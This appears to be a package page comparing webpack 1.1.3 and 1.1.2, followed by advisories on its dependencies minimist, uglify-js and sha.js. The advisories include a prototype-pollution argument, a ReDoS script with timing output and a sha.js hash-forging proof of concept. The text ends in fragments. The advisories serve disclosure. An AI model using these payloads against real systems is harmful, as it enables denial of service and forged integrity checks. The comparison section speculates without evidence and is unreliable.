Webpack versions 1.1.3 and 1.1.2 are incremental updates to a module bundler designed for packaging CommonJs/AMD modules for browser deployment. Both versions share identical core functionality, providing the ability to split codebases into manageable bundles loaded on demand. They both support loaders for preprocessing various file types like JSON, Jade, CoffeeScript, CSS, and Less, alongside custom loaders, streamlining asset management and build processes. The dependency list remains consistent between the two versions, ensuring continued compatibility with essential libraries like async, clone, mkdirp, esprima, tapable, optimist, uglify-js, webpack-core, enhanced-resolve, and node-libs-browser. Similarly, the devDependencies, crucial for development and testing, are also unchanged. These include testing frameworks like mocha and should, along with loaders for various file types and plugins like i18n-webpack-plugin and component-webpack-plugin, ensuring existing development workflows remain intact.
The key difference lies in the release date, with version 1.1.3 released on April 3, 2014, subsequent to version 1.1.2 released on March 31, 2014. This suggests that version 1.1.3 likely incorporates bug fixes, minor improvements, or dependency updates compared to the previous version. Given the minor version increment, developers can expect backward compatibility and a smooth transition. Users should upgrade to version 1.1.3 to benefit from the latest stability enhancements and potential performance improvements, ensuring a more reliable and efficient bundling process. The fact that nothing else changed except the date is interesting and a good sign related to the maturity of the project, everything works, just a small bug needed to be fixed.
All the vulnerabilities related to the version 1.1.3 of the package
Prototype Pollution in minimist
Affected versions of minimist
are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object
, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted
adds a y
property with value Polluted
to all objects. The argument --__proto__=Polluted
raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist
.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js
, function setKey()
(lines 69-95).
Regular Expression Denial of Service in uglify-js
Versions of uglify-js
prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse()
method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.
sha.js is missing type checks leading to hash rewind and passing on crafted data
This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js
, as it has its own implementation.
Missing input type checks can allow types other than a well-formed Buffer
or string
, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
See PoC
const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])
const sha = require('sha.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = sha('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe
Or just:
> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
{length: -x}
. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.{ length: buf.length, ...buf, 0: buf[0] + 256 }
This will result in the same hash as of buf
, but can be treated by other code differently (e.g. bn.js){length:'1e99'}